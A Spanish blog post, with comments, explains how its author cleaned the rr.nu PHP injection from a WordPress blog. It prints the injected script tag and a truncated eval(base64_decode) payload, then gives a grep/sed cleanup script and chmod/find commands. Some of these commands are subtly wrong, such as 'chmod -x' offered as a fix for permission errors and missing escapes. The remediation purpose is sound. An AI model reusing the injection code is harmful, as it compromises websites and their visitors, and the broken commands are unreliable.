Como eliminar el hack o malware de rr.nu de WordPress

Desde hace un tiempo que se me había infectado todo el blog, basado en WordPress, con una especie de malware el cual escribía un código javascript antes del cierre de body

<script type="text/javascript" src="xxxxx.rr.nu"></script>

Esto lo que hacía era lanzar una redirección a una página potencialmente peligrosa con lo que los navegadores de Google Chrome o Firefox (no he llegado a probar con IE) muestran una advertencia y ningún visitante podían ver inicialmente mis artículos.

Pero la base de que se escriba esta llamada javascript en el código HTML, viene porque todos los archivos, o al menos gran parte, habían sido “infectados” con un php injection el cual escribe al inicio de todos los archivos php un código similar al siguiente:

 <?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNz
 ZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGl
 vbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZXRfdGRzXzc3NygkdXJsKXskY29udGVudD
 0iIjskY29udGVudD1AdHJ5Y3VybF83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJ
 GNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZpbGVfNzc3KCR1cmwpO2lmKCRjb250ZW50IT09ZmFsc2UpcmV0
 dXJuICRjb250ZW50OyRjb250ZW50PUB0cnlmb3Blbl83NzcoJHVybCk7aWYoJGNvbnRlbnQhPT1mYWx
 zZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeWZzb2Nrb3Blbl83NzcoJHVybCk7aWYoJGNvbn
 RlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7JGNvbnRlbnQ9QHRyeXNvY2tldF83NzcoJHVybCk7a
 WYoJGNvbnRlbnQhPT1mYWxzZSlyZXR1cm4gJGNvbnRlbnQ7cmV0dXJuICcnO30gIGZ1bmN0aW9uIHRy
 eWN1cmxfNzc3KCR1cmwpe2lmKGZ1bmN0aW9uX2V4aXN0cygnY3VybF9pbml0Jyk9PT1mYWxzZSlyZXR
 1cm4gZmFsc2U7JGNoID0gY3VybF9pbml0ICgpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfVVJMLC
 R1cmwpO2N1cmxfc2V0b3B0ICgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIDEpO2N1cmxfc2V0b
3B0ICgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7Y3VybF9zZXRvcHQgKCRjaCwg...

Al principio pensé que serían unos cuantos, pero poco después descubrí que fueron practicamente todos los archivos dentro de la estructura de wordpress, todos los archivos de administración, todos los archivos de themes, plugins, etc… todo tenía ese código php con el eval y el base64_decode.

SOLUCIÓN

  1. Lo primero que he hecho, sin duda, es cambiar todas la contraseñas, tanto la del administrador de WordPress como la del FTP del servidor y accesso de base de datos. No he llegado a hacer un decode del contenido que había en los archivos “infectados”, y no en todos era el mismo contenido codificado, por lo que a grandes males, grandes remedios. Cambiar todas las contraseñas, por si acaso.
  2. Haz una copia de seguridad de lo que hay, por si el script de limpieza borra algo más de la cuenta.
  3. Descarga el script de limpieza.
  4. [download id=”27″ format=”5″ autop=”false”]

  5. En caso de que no te funcione la descarga o no lo quieras descargar, puedes copiar el código del shell script y pegarlo en un nuevo archivo vacío. Después guárdalo como remove-rr-nu-virus.sh o como quieras llamarlo.
  6. #!/bin/bash
    for file in $(grep -Hlr "aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZX" .); do sed -e "s/));?>/));?>n/g" $file | sed -e "/aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJF9TRVJWRVJbJ21yX25vJ10pKXsgICRfU0VSVkVSWydtcl9ubyddPTE7ICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICBmdW5jdGlvbiBnZX/d" > $file.temp; mv $file.temp $file; echo Fixed infected file $file; done;
    
  7. Éste shell script colócalo en la misma ruta de la carpeta principal de WordPress, y ejecútalo con: ./remove-rr-nu-virus.sh o como lo hayas llamado.
  8. Si te da problemas de permisos, ejecuta lo siguiente: chmod -x remove-rr-nu-virus.sh

Espero que os sea de ayuda, el artículo original es el siguiente: http://www.spkaa.com/3-step-fix-for-your-rr-nu-wordpress-virus-outbreak. Yo con esto he conseguido arreglar por completo el hackeo que me habían hecho y volver tener el blog funcionando al 100% sin ningún archivo “infectado” y sin que ningún lector sea redirigido a webs peligrosas, malditos hackeos!!

Otras mejoras para securizar tu blog es cambiar los permisos de los archivos a como deben estar de manera correcta, para evitar que usuarios no deseados puedan editar los archivos y cambiar su contenido.

Cambiar permisos de los directores en WordPress

find /path/a/tu/wordpress/ -type d -exec chmod 755 {} ;

Cambiar permisos de los ficheros en WordPress

find /path/a/tu/wordpress/ -type f -exec chmod 644 {} ;

Otro artículo que habla sobre este hackeo http://danhilltech.tumblr.com/post/18085864093/if-you-get-eval-base64-hacked-on-wordpress-dreamhost

17 opiniones en “Como eliminar el hack o malware de rr.nu de WordPress”

    1. Hola Juan Manuel, acceder al servidor y ejecutar ese comando es para simplificar enormemente la tarea de buscar y limpiar los archivos. Sino puedes hacer esto por consola, me temo que lo tendrás que hacer a mano, archivo por archivo.
      Por norma general todos los editores de código te permiten abrir varios archivos a la vez, abre todos los que puedas y vas buscando la “injección” de código que te hayan hecho y eliminala a mano.

      Deberás buscar en TODOS! los archivos de raiz de wordpress, pues ese código infecta sino todos, casi, los archivos de wordpress. SUERTE!!

  1. Hola Pedro, gracias por la ayuda que brindas a los que no sabemos mucho del tema. Estoy diseñando una pagina web utilizando una plantilla de wordpress, ya la tengo casi terminada, pero como la página le he ido agregando contenido estando publicada en la web, me topé con que fué infectada con un trojano llamado js.agent-ana y no se como eliminarlo, quisiera saber si el script que que recominedas me funciona para esto, y como aplicarlo, que no tengo idea.
    Gracias.

    1. Podría funcionar. Pero primero debes investigar primero tu código. Tus archivos están sobreescritos? según cuento, a mi me sobrescribieron todos los archivos y insertaron un código php al inicio de cada archivo. Tu tienes algo similar? Si es así debes eliminar todo eso para empezar. Fíjate si lo que tu tienes puede ser parecido a lo que yo estoy comentando en el artículo, después tendrías que modificar el script para que el comando “grep” busque por lo que tu tienes, en vez de lo que hay en el artículo.

      Si tienes más dudas me cuentas.

      Un saludo!

  2. Saludos Pedro, tengo un problema enorme porque cada ciertos meses las visitas me bajan y ahora ha sido peor porque apenas llego a 200 de 900 que tenía, en un problema anterior me llegaba a 300 pero ahora es desesperante, he puesto el codigo en la carpeta de wordpress que me imagino que es la que se baja para instalar el blog, el caso es como se sabe si ya está en función? La baja es demasiado evidente y no tengo nada de sanción, en la base de datos encontré en la wp-options unos codigos que tienen incluidos @ de lo que sé esos codigos solo están en wp_config como es auth key, nuance key y los que siguen el código bueno uno de ellos /*99d=MTQ?d]$nBf] 2.(M@lfti4U??u!XV@,crz-9-ux<G(1R[ K/{pb1PF[bELE7UR/66*/ los tengo encerrado con asteriscos y esos 9 que no sé de que me pueden servir pero he querido borrarlos y cada vez aparecen pero cambiados, el codigo para borrar puede arreglar esto de las visitas porque se que se van para otro lado.

      1. Saludos, ya he revisado en todos lados y es verdad que en casi todas dicen que no estoy infectado, es más, en google no hay ninguna sanción incluso mis posiciones siguen igual en los primeros lugares pero, ¿Por qué bajan mis visitas de un día para el otro? La primera vez fue de 900 a 300 en promedio y se dio cuando instalé un plugin que supuestamente era gratis, “Get traffic SEO” o algo parecido de ahí vino mi calvario, lo desinstalé y de igual el problema seguía incluso por eso instalé el wordpress seo y fue peor porque tenía que quitar el All one seo pack, en total que fue un relajo hasta que quité todo y volví a inatalar el All one seo pack y se acabó el problema aunque me tocó hacer todo el seo a mano de más de 500 artículos, ahora, justo cuando ya estaba para llegar a las visitas que estaban antes, se vino de nuevo el problema solo que esta vez fue demasiado ahora estoy en promedio de 200 que es más bajo que la anterior. he leído en algunos artículos que hay códigos que instalan los hacker que uno no se da cuenta ni los escaner los ubican pero que hay maneras de eliminarlos, como en tu caso, solo que no sé cómo hacerlo, ahora, no sé si la forma en que instalé el código que tú expones lo hice bien porque no vi ningún cambio. Me imagino que si viste ese código que puse en mi comentario anterior? porque ahí está un arroba y eso dicen que es para enviar mis visitas de google para otro lado, ¿Cómo elimino esto ya que son 6? Cada vez que quiero eliminarlos regresan cambiados, ¿Hay alguna carpeta en especial que deba entrar en la base de datos?

        1. Hola Roberto,

          en primer lugar porque tienes la ruta principal de tu dominio, apuntando a hostgator?? http://rsanahuano.com/ esto es una tonteria y no estas aprovechando la fuerza del dominio, y deberías quitar lo de “blog”, dejar tu blog sobre tu dominio, no crear otro nivel de indexación de los contenidos en la ruta.

          Por otro lado te diría que desactives y borres todos los plugins, te quedes con los que realmente necesites. Asegúrate que se borra el código, pero que sepas que los datos que guarda un plugin en base de datos no se suelen borrar, asi que esto puede ser un problema.

          Realmente creo que debes hacer un backup de tu base de datos. Exportes todos tus artículos y los metas de SEO. Las imágenes y otros archivos importantes, y lo borres TODO. Te descargues otra vez WP, crees una base de datos nueva e importes todo. y por supuesto antes de hacer todo esto, cambia todas tus contraseñas, de tu base de datos, de tu servidor, incluso de tu pc o de tu wifi, esto último es un poco paranoico pero todas las medidas de seguridad siempre son buenas.

          1. Muy bueno tu consejo Pedro, ya me temía que tenía que hacerlo y si es así me toca desarmar todo? Y después ¿Me toca poner de uno en uno los artículos con los meta y todo? Cuando dices exportar eso es en la base da datos verdad? Cuando ya instale de nuevo wordpress importo de nuevo? La verdad que estoy como niño en juguetería que no sé como empezar. Me puedes dar una ruta? Por favor porque esto me tiene de cabeza incluso he dejado de escribir por esto porque no le veo sentido seguir aportando contenido sin ganar nada.

            Gracias por tu ayuda y estoy a tu servicio por si quieres cambiar algo de tu vida.

          2. Me estaba olvidando, lo de http://rsanahuano.com/blog eso fue lo que me enseñaron en un curso de como ser emprendedores y ganar dinero en la red, la verdad que ellos no sabían mayor cosa porque desde que empecé me dijeron que haga esto y después me di cuenta de que estaba mal pero ya está hecho, ¿Acaso se puede cambiar? Incluso lo del nombre del dominio está mal pero ellos como gran cosa prácticamente me timaron y no sé a cuantos más. Se dan el lujo de cobrar 98 euros por consulta como si fueran expertos.

  3. Hola, perdona mi ignorancia pero me ha sucedido esto con 2 blog diferentes en una semana. Entiendo todo el precedimiento que explicas pero no se como se ejecuta el script desde la consola
    5.Éste shell script colócalo en la misma ruta de la carpeta principal de WordPress, y ejecútalo con: ./remove-rr-nu-virus.sh o como lo hayas llamado.
    Gracias por tu ayuda

  4. Saludos Pedro, hice como me dijiste que hiciera incluso te puedes dar cuenta que en mi url ya no figura /blog/ por lo tanto mi ruta quedó como se supone que debía ser, es decir, http://rsanahuano.com así de simple pero, me he llevado la sorpresa de que mis visitas han bajado que da miedo, incluso casi a cero, da la impresión de que le remedio fue peor que la enfermedad, por lo demás no sé porque me salen muchas paginas duplicadas incluso hay paginas que solo salen las imágenes como si fueran artículos, lo que he hecho como sanidad es ir eliminando las URL que me salen así http://rsanahuano.com/la-envidia/la-envidia/ te das cuenta de que el título sale repetido? Con esto hayq ue ver que pasa y si hay alguna forma de arreglar porque incluso en las herramientas de web máster hay 568 artículos y cero indexadas no sé si es por el cambio de la URL.

    Gracias y por favor responde lo que más puedas.

    1. Hola Roberto,

      A ver los cambios de urls siempre son un poco dramáticos, pero si la nueva estructura es mejor, tu tranquilo Google te volverá a dar la posición que tenías o incluso mejor. Yo he realizado 3 cambios de urls en este blog, siempre he caído de visitas pero con el tiempo he subido mucho más de lo que estaba antes de hacer el cambio de urls.

      Sobre las urls duplicadas, eso es importante que lo revises bien. Comentarte que todas las urls viejas, wordpress las va a redireccionar automáticamente a las nuevas, así que por eso no te preocupes, wordpress ya hace todo este trabajo que redireccionar que es muy importante.

      Por mi experiencia, he tenido muchas caídas de posicionamiento, tanto en cambios de urls, como en hackeos que han hecho en mi blog, como problemas en el servidor, pero después de un tiempo siempre vuelvo a tener las visitas anteriores. Cierto es que en algunas ocasiones me ha tardado hasta 3-4 meses.

      Una cosa que puedes ir haciendo es intentar forzar la indexación ayudando a Google con un sitemap. Prueba a instalar el plugin: Google XML Sitemaps y luego agregas la url del sitemap en Google WebMaster tool. Que por cierto haciendo un site:http://rsanahuano.com en Google veo que tienes bastante contenido en indexado, por lo que problema de indexación no tienes.

      Otro detalle, es la navegabilidad de tu blog, así como el diseño y publicidad. Creo que sino tienes visitas, es tontería tener publicidad, porque lo único que estas haciendo es meter 3 bloques de publicidad que estorban y perjudican a los pocos usuarios que están entrando y quieren leer los contenidos que estas poniendo. Tienes 2 bloques de publicidad incrustados en el contenido, esto es un poco feo. El último que esta entre los comentarios y los artículos relacionados es menos intrusivo. Creo que por ahora debes potenciar la visita y fidelización del usuario antes que la monetización.

      Otra cosa, porque en el menú lateral, sección categorías pone “sin categorías”, es que no tienes ningún artículo sin categorizar? En tal caso, quita el widget de categorías del sidebar.

      Me imagino que ya lo sabrás pero cuando escribas intenta poner palabras claves de búsquedas, para mejorar la densidad de palabras relevantes. Otra cosa es intenta relacionar todo tu contenido entre sí con enlaces, esto mejorará el interlinking de tu site.
      Añade una miga de pan: este plugin es bueno: Breadcumbs Plus

      Todos estos consejos de SEO son gratis, el próximo asesoramiento ya te tendré que cobrar 😉

      Para tener un buen posicionamiento en Google hay que tener muchos temas en cuenta, una vez que tengas parte del trabajo hecho, toca tener paciencia.

      Un saludo!

  5. Hola Pedro, estaba leyendo paso a paso como eliminar el malware de WordPress y me estoy haciendo un verdadero lío. La web de mi trabajo se llama grupomyg.com aparece debajo del buscador una frase azul (código malicioso que se ha colado). El caso es que no se dónde poner el código shell script, si en una página determinada o qué.
    Mi perfil no es informático, por lo que si puedes ser más específico, te lo agradecería.

    Mil gracias de antemano.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *